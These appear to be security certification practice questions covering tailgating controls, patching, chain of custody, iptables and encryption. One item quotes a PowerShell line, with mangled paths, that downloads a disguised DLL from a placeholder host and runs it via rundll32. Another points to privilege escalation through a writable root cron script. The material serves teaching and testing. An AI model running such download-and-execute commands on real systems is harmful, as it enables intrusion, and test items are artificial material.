An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is
reverse engineering what the file does and finds that it executes the following script:
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -URI https://
somehost.com/04EB18.jpg -OutFile $env:TEMPautoupdate.dll;Start-Process
rundl132.exe $env:TEMPautoupdate.dll
Which of the following BEST describes what the analyst found?


A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.

A penetration tester executes the command crontab -l while working in a Linux server environment. The
penetration tester observes the following string in the current user's list of cron jobs:
*/10 * * * * root /writable/update.sh
Which of the following actions should the penetration tester perform NEXT?


A. Privilege escalation
B. Memory leak
C. Directory traversal
D. Race condition

Which of the following controls would provide the BEST protection against tailgating?


A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage

A company recently implemented a patch management policy; however, vulnerability scanners have still been
flagging several hosts, even after the completion of the patch process. Which of the following is the MOST
likely cause of the issue?


A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.

An incident response technician collected a mobile device during an investigation. Which of the following should
the technician do to maintain chain of custody?


A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration.
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules,
but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the
following would be the BEST option to remove the rules?


A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The
installation of the antivirus application was tested on many personal devices, and no issues were observed.
Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the
company decided to remove the mining software. The antivirus application was MOST likely classifying the
software as:


A. a rootkit.
B. a PUP.
C. a backdoor.
D. ransomware.
E. a RAT.

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and
manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the
data due to its sensitivity. The financial institution is not concerned about computational overheads and slow
speeds. Which of the following cryptographic techniques would BEST meet the requirement?


A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral

As part of annual audit requirements, the security team performed a review of exceptions to the company policy
that allows specific users the ability to use USB storage devices on their laptops. The review yielded the
following results:
The exception process and policy have been correctly followed by the majority of users.
A small number of users did not create tickets for the requests but were granted access.
All access had been approved by supervisors.
Valid requests for the access sporadically occurred across multiple departments.
Access, in most cases, had not been removed when it was no longer needed.
Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded
access is removed in a reasonable time frame?


A. Create an automated, monthly attestation process that removes access if an employee's supervisor denies
the approval.

B. Remove access for all employees and only allow new access to be granted if the employee's supervisor
approves the request.

C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with
the management team.

D. Implement a ticketing system that tracks each request and generates reports listing which employees
actively use USB storage devices.

Users report access to an application from an internal workstation is still unavailable to a specific server, even
after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful
between the two devices. Which of the following tools should the security analyst use to help identify if the
traffic is being blocked?


A. nmap
B. tracert
C. ping
D. ssh